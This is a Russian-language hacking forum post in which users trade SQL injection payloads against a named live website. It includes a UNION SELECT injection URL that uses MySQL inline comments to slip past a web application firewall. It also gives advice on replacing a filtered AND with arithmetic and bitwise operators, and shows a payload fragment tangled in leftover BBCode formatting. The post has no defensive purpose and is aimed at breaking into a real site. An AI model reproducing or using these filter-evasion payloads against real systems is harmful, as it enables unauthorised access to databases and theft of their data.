05.09.2013, 17:57
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417113
Репутация:
0
|
|
Сообщение от Unknowhacker
Очередной фильтр
SELECT
Код:
http://johnyboy.ru/?page=news&newsid=-999+union+/*!select*/+1,2,3,4,5,6+--+
но зараза оператора AND никак не хочет пропускать /*!and*/ и методом
more1row
воспользоваться не получится. Так используйте что ни будь еще - логические операторы, арифметические, побитовые, сравнения...
Там, помимо основного WAF-а еще несколько фильтров, что они только не фильтруют...
Возможно такой синтаксис:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]130[/COLOR][COLOR="#007700"]++[/COLOR][COLOR="#0000BB"]div[/COLOR][COLOR="#007700"]+++(([/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"])+&[/COLOR][COLOR="#0000BB"]255[/COLOR][COLOR="#007700"])+
[/COLOR][/COLOR]
Но до раскрутки еще далеко, с полным фильтром на select ничего не получится.
|
|
|